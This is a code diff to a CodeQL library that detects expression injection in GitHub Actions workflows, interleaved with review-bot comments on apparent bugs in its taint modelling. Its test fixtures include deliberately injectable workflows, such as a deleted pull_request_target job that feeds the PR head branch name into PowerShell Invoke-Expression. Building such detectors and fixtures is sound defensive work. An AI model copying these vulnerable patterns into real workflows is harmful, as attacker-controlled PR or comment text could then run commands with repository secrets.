+++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -2,21 +2,31 @@ private import internal.ExternalFlowExtensions as Extensions import codeql.actions.DataFlow import actions -/** Holds if a source model exists for the given parameters. */ +/** + * MaD sources + * Fields: + * - action: Fully-qualified action name (NWO) + * - version: Either '*' or a specific SHA/Tag + * - output arg: To node (prefixed with either `env.` or `output.`) + * - trigger: Triggering event under which this model introduces tainted data. Use `*` for any event. + */ predicate sourceModel(string action, string version, string output, string trigger, string kind) { Extensions::sourceModel(action, version, output, trigger, kind) } -/** Holds if a sink model exists for the given parameters. */ +/** + * MaD summaries + * Fields: + * - action: Fully-qualified action name (NWO) + * - version: Either '*' or a specific SHA/Tag + * - input arg: From node (prefixed with either `env.` or `input.`) + * - output arg: To node (prefixed with either `env.` or `output.`) + * - kind: Either 'Taint' or 'Value' + */ predicate summaryModel(string action, string version, string input, string output, string kind) { Extensions::summaryModel(action, version, input, output, kind) } -/** Holds if a sink model exists for the given parameters. */ -predicate sinkModel(string action, string version, string input, string kind) { - Extensions::sinkModel(action, version, input, kind) -} - /** * MaD sinks * Fields: 
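Review bot: The new comment on `summaryModel` documents `kind` as `Either 'Taint' or 'Value'`, while `externallyDefinedSummary`, added further down in this file, matches the literal `"taint"` only. A model row written as documented would be silently ignored, which for a security query means a missed flow rather than an error. I would write the line as `- kind: 'taint' (the only kind consumed so far)`, and add the missing `- kind` entry to the `sourceModel` comment, which lists four of the predicate's five columns.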
@@ -25,7 +35,55 @@ predicate sinkModel(string action, string version, string input, string kind) { * - input arg: sink node (prefixed with either `env.` or `input.`) * - kind: sink kind */ -predicate sinkNode(DataFlow::ExprNode sink, string kind) { +predicate sinkModel(string action, string version, string input, string kind) { + Extensions::sinkModel(action, version, input, kind) +} + +predicate externallyDefinedSource(DataFlow::Node source, string sourceType, string fieldName) { + exists(UsesExpr uses, string action, string version, string trigger, string kind | + sourceModel(action, version, fieldName, trigger, kind) and + uses.getCallee() = action.toLowerCase() and + ( + if version.trim() = "*" + then uses.getVersion() = any(string v) + else uses.getVersion() = version.trim() + ) and + ( + if fieldName.trim().matches("env.%") + then source.asExpr() = uses.getEnvExpr(fieldName.trim().replaceAll("env\\.", "")) + else + if fieldName.trim().matches("output.%") + then + // 'output.' is the default qualifier + source.asExpr() = uses + else none() + ) and + sourceType = kind + ) +} + +predicate externallyDefinedSummary(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(UsesExpr uses, string action, string version, string input, string output | + c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and + summaryModel(action, version, input, output, "taint") and + uses.getCallee() = action.toLowerCase() and + ( + if version.trim() = "*" + then uses.getVersion() = any(string v) + else uses.getVersion() = version.trim() + ) and + ( + if input.trim().matches("env.%") + then pred.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env\\.", "")) + else + // 'input.' 
is the default qualifier + pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input\\.", "")) + ) and + succ.asExpr() = uses + ) +} + +predicate externallyDefinedSink(DataFlow::ExprNode sink, string kind) { exists(UsesExpr uses, string action, string version, string input | ( if input.trim().matches("env.%") @@ -33,7 +91,7 @@ predicate sinkNode(DataFlow::ExprNode sink, string kind) { else sink.asExpr() = uses.getArgumentExpr(input.trim()) ) and sinkModel(action, version, input, kind) and - uses.getCallee() = action and + uses.getCallee() = action.toLowerCase() and ( if version.trim() = "*" then uses.getVersion() = any(string v) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index fae6c74b0b3..2b35b2f332f 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
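Review bot: The prefix stripping in `externallyDefinedSource` and `externallyDefinedSummary` uses `replaceAll("env\\.", "")`, `replaceAll("input\\.", "")` and `replaceAll("output\\.", "")`, and to my knowledge QL's `replaceAll` replaces a literal substring (the regex variant is `regexpReplaceAll`), so the escaped dot never matches and the prefix stays in place. If so, `uses.getEnvExpr("env.FOO")` finds nothing and no `FieldContent` is named `output.foo`, because field names come from `[A-Za-z0-9_-]+` captures; modelled env sources and summaries would then be dropped without any error. I would strip the prefix with `fieldName.trim().regexpReplaceAll("^env\\.", "")` (and likewise for `input.` and `output.`), and apply the same change to `runEnvToScriptstep` in FlowSteps.qll. A test workflow that relies on an `env.` model row would confirm either way.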
@@ -126,40 +126,14 @@ private class EventSource extends RemoteFlowSource { } /** - * MaD sources - * Fields: - * - action: Fully-qualified action name (NWO) - * - version: Either '*' or a specific SHA/Tag - * - output arg: To node (prefixed with either `env.` or `output.`) - * - trigger: Triggering event under which this model introduces tainted data. Use `*` for any event. + * A Source of untrusted data defined in a MaD specification */ private class ExternallyDefinedSource extends RemoteFlowSource { - string soutceType; + string sourceType; - ExternallyDefinedSource() { - exists( - UsesExpr uses, string action, string version, string output, string trigger, string kind - | - sourceModel(action, version, output, trigger, kind) and - uses.getCallee() = action and - ( - if version.trim() = "*" - then uses.getVersion() = any(string v) - else uses.getVersion() = version.trim() - ) and - ( - if output.trim().matches("env.%") - then this.asExpr() = uses.getEnvExpr(output.trim().replaceAll("output\\.", "")) - else - // 'output.' is the default qualifier - // TODO: Taint just the specified output - this.asExpr() = uses - ) and - soutceType = kind - ) - } + ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _) } - override string getSourceType() { result = soutceType } + override string getSourceType() { result = sourceType } } /** diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 750a4011320..9def461900e 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
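Review bot: `ExternallyDefinedSource` marks every matching `uses` step as a remote source whatever event starts the workflow: its characteristic predicate delegates to `externallyDefinedSource`, which binds `trigger` from the model row but never relates it to the workflow. The model comment describes that column as the event under which the data is tainted, and the rows distinguish `pull_request`, `pull_request_target` and `*`, so workflows that run only on trusted events would be over-reported. Until the trigger is enforced I would say so on the class: `// NOTE: the model's trigger column is not checked yet; the source applies under any event`.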
@@ -21,42 +21,11 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } -/** - * MaD summaries - * Fields: - * - action: Fully-qualified action name (NWO) - * - version: Either '*' or a specific SHA/Tag - * - input arg: From node (prefixed with either `env.` or `input.`) - * - output arg: To node (prefixed with either `env.` or `output.`) - * - kind: Either 'Taint' or 'Value' - */ -predicate externallyDefinedSummary(DataFlow::Node pred, DataFlow::Node succ) { - exists(UsesExpr uses, string action, string version, string input | - // `output` not used yet - summaryModel(action, version, input, _, "taint") and - uses.getCallee() = action and - ( - if version.trim() = "*" - then uses.getVersion() = any(string v) - else uses.getVersion() = version.trim() - ) and - ( - if input.trim().matches("env.%") - then pred.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env\\.", "")) - else - // 'input.' is the default qualifier - pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input\\.", "")) - ) and - succ.asExpr() = uses - ) -} - -private class ExternallyDefinedSummary extends AdditionalTaintStep { - override predicate step(DataFlow::Node pred, DataFlow::Node succ) { - externallyDefinedSummary(pred, succ) - } -} - +// private class RunEnvToScriptStep extends AdditionalTaintStep { +// override predicate step(DataFlow::Node pred, DataFlow::Node succ) { +// runEnvToScriptstep(pred, succ) +// } +// } /** * Holds if a Run step declares an environment variable, uses it in its script and sets an output in its script. * e.g. 
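Review bot: The hunk leaves `RunEnvToScriptStep` behind as five commented-out lines directly above the doc comment of `runEnvToScriptstep`. The predicate now takes a `ContentSet` and is consumed by `storeStep` in DataFlowPrivate.qll, so the old `AdditionalTaintStep` wrapper cannot be re-enabled as written; I would delete it instead of commenting it out, which also lets the following doc comment sit next to the predicate it describes. That doc comment continues outside the hunk.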
@@ -68,23 +37,21 @@ private class ExternallyDefinedSummary extends AdditionalTaintStep { * INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') * echo "Cleaned Initial URL: $INITIAL_URL" * echo "::set-output name=initial_url::$INITIAL_URL" + * echo "foo=$(echo $TAINTED)" >> $GITHUB_OUTPUT + * echo "test=${{steps.step1.outputs.MSG}}" >> "$GITHUB_OUTPUT" */ -private class RunEnvToScriptStep extends AdditionalTaintStep { - override predicate step(DataFlow::Node pred, DataFlow::Node succ) { - runEnvToScriptstep(pred, succ) - } -} - -predicate runEnvToScriptstep(DataFlow::Node pred, DataFlow::Node succ) { - exists(RunExpr r, string varName | +predicate runEnvToScriptstep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(RunExpr r, string varName, string output | + c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and r.getEnvExpr(varName) = pred.asExpr() and exists(string script, string line | script = r.getScript() and line = script.splitAt("\n") and ( - line.regexpMatch(".*::set-output\\s+name.*") or - line.regexpMatch(".*>>\\s*\\$GITHUB_OUTPUT.*") + output = line.regexpCapture(".*::set-output\\s+name=(.*)::.*", 1) or + output = line.regexpCapture(".*echo\\s*\"(.*)=.*\\s*>>\\s*(\")?\\$GITHUB_OUTPUT.*", 1) ) and + // TODO: repalce script with line below script.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 ) and succ.asExpr() = r diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 79bd48b395a..55fda038789 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll 
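Review bot: The `$GITHUB_OUTPUT` pattern captures the output name with a greedy `(.*)=`, so on a line whose value contains `=` (a URL with a query string, `key=a=b`) the captured name runs up to the last `=` and no `FieldContent` matches; the pattern also requires a double quote after `echo`, so `echo name=$VAR >> $GITHUB_OUTPUT` is not recognised. Both cases lose the store step, which shows up as a missed flow. I would restrict the name to the characters the context regexes accept: `output = line.regexpCapture(".*echo\\s+\"?([A-Za-z0-9_-]+)=.*>>\\s*\"?\\$GITHUB_OUTPUT.*", 1)`. The variable-use check on the last line still tests the whole `script` rather than `line`, as the TODO says (its `repalce` should read `replace`).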
@@ -4,6 +4,8 @@ private import codeql.actions.Cfg as Cfg private import codeql.Locations private import codeql.actions.controlflow.BasicBlocks private import DataFlowPublic +private import codeql.actions.dataflow.ExternalFlow +private import codeql.actions.dataflow.FlowSteps cached newtype TNode = TExprNode(DataFlowExpr e) 
@@ -129,25 +131,43 @@ predicate compatibleTypes(DataFlowType t1, DataFlowType t2) { t1 = t2 } predicate typeStrongerThan(DataFlowType t1, DataFlowType t2) { none() } -private newtype TContent = TNoContent() { none() } +newtype TContent = + TFieldContent(string name) { + name = any(StepsCtxAccessExpr a).getFieldName() or + name = any(NeedsCtxAccessExpr a).getFieldName() or + name = any(JobsCtxAccessExpr a).getFieldName() + } +/** + * A reference contained in an object. Examples include instance fields, the + * contents of a collection object, the contents of an array or pointer. + */ class Content extends TContent { + /** Gets the type of the contained data for the purpose of type pruning. */ + DataFlowType getType() { any() } + /** Gets a textual representation of this element. */ - string toString() { none() } + abstract string toString(); + + /** + * Holds if this element is at the specified location. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `filepath`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ + predicate hasLocationInfo( + string filepath, int startline, int startcolumn, int endline, int endcolumn + ) { + filepath = "" and startline = 0 and startcolumn = 0 and endline = 0 and endcolumn = 0 + } } -predicate forceHighPrecision(Content c) { none() } +predicate forceHighPrecision(Content c) { c instanceof FieldContent } -newtype TContentSet = TNoContentSet() { none() } +class ContentApprox = ContentSet; -private newtype TContentApprox = TNoContentApprox() { none() } - -class ContentApprox extends TContentApprox { - /** Gets a textual representation of this element. */ - string toString() { none() } -} - -ContentApprox getContentApprox(Content c) { none() } +ContentApprox getContentApprox(Content c) { result = c } /** * Made a string to match the ArgumentPosition type. 
@@ -169,11 +189,15 @@ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = /** * Holds if there is a local flow step between a ${{}} expression accesing a step output variable and the step output itself + * But only for those cases where the step output is defined externally in a MaD specification. + * The reason for this is that we don't currently have a way to specify that a source starts with a non-empty access + * path so the easiest thing is to add the corresponding read steps of that field as local flow steps as well. * e.g. ${{ steps.step1.output.foo }} */ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(StepStmt astFrom, StepOutputAccessExpr astTo | - (astFrom instanceof UsesExpr or astFrom instanceof RunExpr) and + exists(StepStmt astFrom, StepsCtxAccessExpr astTo | + externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName()) and + astFrom instanceof UsesExpr and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getRefExpr() = astFrom @@ -182,13 +206,14 @@ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { /** * Holds if there is a local flow step between a ${{}} expression accesing a job output variable and the job output itself - * e.g. ${{ needs.job1.output.foo }} or ${{ job.job1.output.foo }} + * e.g. ${{ needs.job1.output.foo }} or ${{ jobs.job1.output.foo }} */ predicate jobsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, JobOutputAccessExpr astTo | + exists(Expression astFrom, CtxAccessExpr astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and - astTo.getRefExpr() = astFrom + astTo.getRefExpr() = astFrom and + (astTo instanceof NeedsCtxAccessExpr or astTo instanceof JobsCtxAccessExpr) ) } 
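Review bot: `jobsCtxLocalStep` still covers a `NeedsCtxAccessExpr` whose job calls a reusable workflow: for those, `getRefExpr()` returns `job.getUsesExpr()` for any field name, so a plain local step links the `uses` node to every `needs.JOB.outputs.*` access, next to the field-specific read added later in this file as `reusableWorkflowReturnReadStep`. If the intent of the commit is that only the named output is read, I would exclude that case here with `not astTo.(NeedsCtxAccessExpr).usesReusableWorkflow()`, or document why both steps are needed. The example in the comment should also read `outputs` rather than `output`, as should the one in the `stepsCtxLocalStep` hunk before it.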
@@ -197,7 +222,7 @@ predicate jobsCtxLocalStep(Node nodeFrom, Node nodeTo) { * e.g. ${{ inputs.foo }} */ predicate inputsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, InputAccessExpr astTo | + exists(Expression astFrom, InputsCtxAccessExpr astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getRefExpr() = astFrom @@ -209,10 +234,13 @@ predicate inputsCtxLocalStep(Node nodeFrom, Node nodeTo) { * e.g. ${{ env.foo }} */ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, EnvAccessExpr astTo | + exists(Expression astFrom, EnvCtxAccessExpr astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and - astTo.getRefExpr() = astFrom + ( + externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName()) or + astTo.getRefExpr() = astFrom + ) ) } 
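Review bot: The new first disjunct in `envCtxLocalStep`, `externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName())`, relates `nodeFrom` to `astTo` by variable name only. Any `${{ env.NAME }}` expression in any workflow of the database would receive flow from every modelled step that sets a variable of that name, which reads as cross-workflow false positives. I would at least require the same file, `nodeFrom.asExpr().getLocation().getFile() = astTo.getLocation().getFile()`, and ideally the same job, since a variable exported by a step is presumably visible only to later steps of that job.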
@@ -244,19 +272,63 @@ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFr */ predicate jumpStep(Node nodeFrom, Node nodeTo) { none() } +/** + * A read step to read the value of a ReusableWork uses step and connect it to its + * corresponding JobOutputAccessExpr + */ +predicate reusableWorkflowReturnReadStep(Node node1, Node node2, ContentSet c) { + exists(NeedsCtxAccessExpr expr, string fieldName | + expr.usesReusableWorkflow() and + expr.getRefExpr() = node1.asExpr() and + expr.getFieldName() = fieldName and + expr = node2.asExpr() and + c = any(FieldContent ct | ct.getName() = fieldName) + ) +} + /** * Holds if data can flow from `node1` to `node2` via a read of `c`. Thus, * `node1` references an object with a content `c.getAReadContent()` whose * value ends up in `node2`. */ -predicate readStep(Node node1, ContentSet c, Node node2) { none() } +predicate readStep(Node node1, ContentSet c, Node node2) { + // TODO: Extract to its own predicate + exists(StepsCtxAccessExpr access | + c = any(FieldContent ct | ct.getName() = access.getFieldName()) and + node1.asExpr() = access.getRefExpr() and + node2.asExpr() = access + ) + or + reusableWorkflowReturnReadStep(node1, node2, c) +} + +/** + * A store step to store the value of a ReusableWorkflowStmt output expr into the return node (node2) + * with a given access path (fieldName) + */ +predicate reusableWorkflowReturnStoreStep(Node node1, Node node2, ContentSet c) { + exists(ReusableWorkflowStmt stmt, OutputsStmt out, string fieldName | + out = stmt.getOutputsStmt() and + node1.asExpr() = out.getOutputExpr(fieldName) and + node2.asExpr() = out and + c = any(FieldContent ct | ct.getName() = fieldName) + ) +} /** * Holds if data can flow from `node1` to `node2` via a store into `c`. Thus, * `node2` references an object with a content `c.getAStoreContent()` that * contains the value of `node1`. 
*/ -predicate storeStep(Node node1, ContentSet c, Node node2) { none() } +predicate storeStep(Node node1, ContentSet c, Node node2) { + reusableWorkflowReturnStoreStep(node1, node2, c) + or + // TODO: rename to xxxxStoreStep + externallyDefinedSummary(node1, node2, c) + or + // TODO: rename to xxxxStoreStep + runEnvToScriptstep(node1, node2, c) +} /** * Holds if values stored inside content `c` are cleared at node `n`. For example, diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 0204015ac22..52101c7e5a7 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -83,18 +83,18 @@ class ArgumentNode extends ExprNode { * Reusable workflow output nodes */ class ReturnNode extends ExprNode { - private OutputExpr output; + private OutputsStmt outputs; ReturnNode() { - this.asExpr() = output and - output = any(OutputsStmt s).getOutputExpr(_) + this.asExpr() = outputs and + outputs = any(ReusableWorkflowStmt s).getOutputsStmt() } ReturnKind getKind() { result = TNormalReturn() } - override string toString() { result = "output " + output.toString() } + override string toString() { result = "output " + outputs.toString() } - override Location getLocation() { result = output.getLocation() } + override Location getLocation() { result = outputs.getLocation() } } /** Gets the node corresponding to `e`. */ 
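Review bot: The doc comment on `reusableWorkflowReturnReadStep` refers to `JobOutputAccessExpr` and to a `ReusableWork uses step`, but this commit replaces that class with `NeedsCtxAccessExpr` in Ast.qll. I would write it as `A read step from the uses expression of a job that calls a reusable workflow to a needs.JOB.outputs.FIELD access of that job, reading content FIELD.` The three TODOs in `readStep` and `storeStep` would be better resolved in this commit than left as comments, since the names `externallyDefinedSummary` and `runEnvToScriptstep` no longer say that they are store steps.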
@@ -106,13 +106,38 @@ Node exprNode(DataFlowExpr e) { result = TExprNode(e) } * The set may be interpreted differently depending on whether it is * stored into (`getAStoreContent`) or read from (`getAReadContent`). */ -class ContentSet extends TContentSet { - /** Gets a textual representation of this element. */ - string toString() { none() } - +class ContentSet instanceof Content { /** Gets a content that may be stored into when storing into this set. */ - Content getAStoreContent() { none() } + Content getAStoreContent() { result = this } /** Gets a content that may be read from when reading from this set. */ - Content getAReadContent() { none() } + Content getAReadContent() { result = this } + + /** Gets a textual representation of this content set. */ + string toString() { result = super.toString() } + + /** + * Holds if this element is at the specified location. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `filepath`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ + predicate hasLocationInfo( + string filepath, int startline, int startcolumn, int endline, int endcolumn + ) { + super.hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn) + } +} + +/** A field of an object, for example an instance variable. */ +class FieldContent extends Content, TFieldContent { + private string name; + + FieldContent() { this = TFieldContent(name) } + + /** Gets the name of the field. */ + string getName() { result = name } + + override string toString() { result = name } } diff --git a/ql/lib/ext/tj-actions-changed-files.model.yml b/ql/lib/ext/tj-actions-changed-files.model.yml index a3f687a0611..3cd0871c883 100644 --- a/ql/lib/ext/tj-actions-changed-files.model.yml +++ b/ql/lib/ext/tj-actions-changed-files.model.yml 
@@ -3,26 +3,26 @@ extensions: pack: codeql/actions-all extensible: sourceModel data: - - [ "tj-actions/changed-files", "*", "added_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_changed_and_modified_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_changed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_modified_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_old_new_renamed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "any_changed", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "any_deleted", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "any_modified", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "changed_keys", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "copied_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "deleted_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "modified_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "modified_keys", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "only_changed", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "only_deleted", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "only_modified", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_changed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_deleted_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_modified_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "renamed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "type_changed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "unknown_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "unmerged_files", 
"*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.added_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.all_changed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.all_modified_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.any_changed", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.any_deleted", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.any_modified", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.changed_keys", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.copied_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.deleted_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.modified_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.modified_keys", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.only_changed", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.only_deleted", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.only_modified", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.other_changed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.other_deleted_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.other_modified_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.renamed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.type_changed_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", 
"output.unknown_files", "*", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "output.unmerged_files", "*", "PR changed files" ] diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 6860f091d5e..4b47a154a1d 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -20,7 +20,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or - sinkNode(this, "expression-injection") + externallyDefinedSink(this, "expression-injection") } } @@ -37,5 +37,5 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential injection from the ${{ " + sink.getNode().asExpr().(ExprAccessExpr).getExpression() + + "Potential injection from the ${{ " + sink.getNode().asExpr().(CtxAccessExpr).getExpression() + " }}, which may be controlled by an external user." diff --git a/ql/src/test/.github/workflows/ci-cleanup.yml b/ql/src/test/.github/workflows/ci-cleanup.yml deleted file mode 100644 index 11a101cef49..00000000000 --- a/ql/src/test/.github/workflows/ci-cleanup.yml +++ /dev/null 
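Review bot: Several rows in this source model (`output.any_changed`, `output.any_deleted`, `output.any_modified`, `output.only_changed`, `output.only_deleted`, `output.only_modified`) are, as far as I know, boolean flags of the action rather than file-name lists. If so, they do not carry attacker-chosen text, and treating them as "PR changed files" sources will add alerts that reviewers learn to ignore. Consider dropping those rows or adding a YAML comment that explains why they are kept. The new `no-flow` step in `simple2.yml` already tests an unmodelled output in the same way.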
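Review bot: The inline cast `sink.getNode().asExpr().(CtxAccessExpr)` in the `select` message also acts as a filter, so a path whose sink expression is not a `CtxAccessExpr` yields no row and the finding is dropped without a diagnostic. `ExpressionInjectionSink` accepts any `RunExpr` script expression and any `externallyDefinedSink`, and nothing visible in this hunk guarantees that those are context accesses. I would build the message from `sink.getNode().toString()`, or put the type restriction in the sink class so that it is explicit. The text also says "injection from" while printing the sink rather than the source.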
@@ -1,47 +0,0 @@ -run-name: Cleanup ${{ github.head_ref }} -on: - pull_request_target: - types: labeled - paths: - - "images/**" - -jobs: - clean_ci: - name: Clean CI runs - runs-on: ubuntu-latest - permissions: - actions: write - steps: - - env: - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - shell: pwsh - run: | - $startDate = Get-Date -UFormat %s - $workflows = @("macos11", "macos12", "ubuntu2004", "ubuntu2204", "windows2019", "windows2022") - while ($true) { - $continue = $false - foreach ($wf in $workflows) { - $skippedCommand = "gh run list --workflow ${wf}.yml --branch ${{ github.event.pull_request.head.ref }} --repo ${{ github.repository }} --status skipped --json databaseId" - $skippedIds = Invoke-Expression -Command $skippedCommand | ConvertFrom-Json | ForEach-Object { $_.databaseId } - $skippedIds | ForEach-Object { - $deleteCommand = "gh run delete --repo ${{ github.repository }} $_" - Invoke-Expression -Command $deleteCommand - } - $pendingCommand = "gh run list --workflow ${wf}.yml --branch ${{ github.event.pull_request.head.ref }} --repo ${{ github.repository }} --status requested --json databaseId --template '{{ . | len }}'" - $pending = Invoke-Expression -Command $pendingCommand - if ($pending -gt 0) { - Write-Host "Pending for ${wf}.yml: $pending run(s)" - $continue = $true - } - } - if ($continue -eq $false) { - Write-Host "All done, exiting" - break - } - $curDate = Get-Date -UFormat %s - if (($curDate - $startDate) -gt 60) { - Write-Host "Reached timeout, exiting" - break - } - Write-Host "Waiting 5 seconds..." - Start-Sleep -Seconds 5 diff --git a/ql/src/test/.github/workflows/image_link_generator.yml b/ql/src/test/.github/workflows/image_link_generator.yml index 6239f0490d1..9ebb7bbf2be 100644 --- a/ql/src/test/.github/workflows/image_link_generator.yml +++ b/ql/src/test/.github/workflows/image_link_generator.yml 
@@ -14,35 +14,39 @@ jobs: - name: Extract and Clean Initial URL id: extract-url + env: + BODY: ${{ github.event.comment.body }} run: | - INITIAL_URL=$(echo "${{ github.event.comment.body }}" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') + INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') echo "Cleaned Initial URL: $INITIAL_URL" echo "::set-output name=initial_url::$INITIAL_URL" - name: Get Redirected URL with Debugging id: curl + env: + INITIAL_URL: ${{ steps.extract-url.outputs.initial_url }} run: | - REDIRECTED_URL=$(curl -L -o /dev/null -w %{url_effective} -sS "${{ steps.extract-url.outputs.initial_url }}") + REDIRECTED_URL=$(curl -L -o /dev/null -w %{url_effective} -sS "$INITIAL_URL") echo "Curl Command Executed" echo "Redirected URL: $REDIRECTED_URL" echo "::set-output name=redirected_url::$REDIRECTED_URL" - name: Trim URL after PNG id: trim-url + env: + REDIRECTED_URL: ${{ steps.curl.outputs.redirected_url }} run: | - TRIMMED_URL=$(echo "${{ steps.curl.outputs.redirected_url }}" | sed 's/\(.*\.png\).*/\1/') + TRIMMED_URL=$(echo "$REDIRECTED_URL" | sed 's/\(.*\.png\).*/\1/') echo "Trimmed URL: $TRIMMED_URL" echo "::set-output name=trimmed_url::$TRIMMED_URL" - - name: Output Final Trimmed URL - run: | - echo "Final Trimmed Image URL: ${{ steps.trim-url.outputs.trimmed_url }}" - - name: Update Comment with New URL + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + COMMENT_URL: ${{ github.event.comment.url }} + ORIGINAL_COMMENT_BODY: ${{ github.event.comment.body }} run: | - COMMENT_URL="${{ github.event.comment.url }}" NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" - 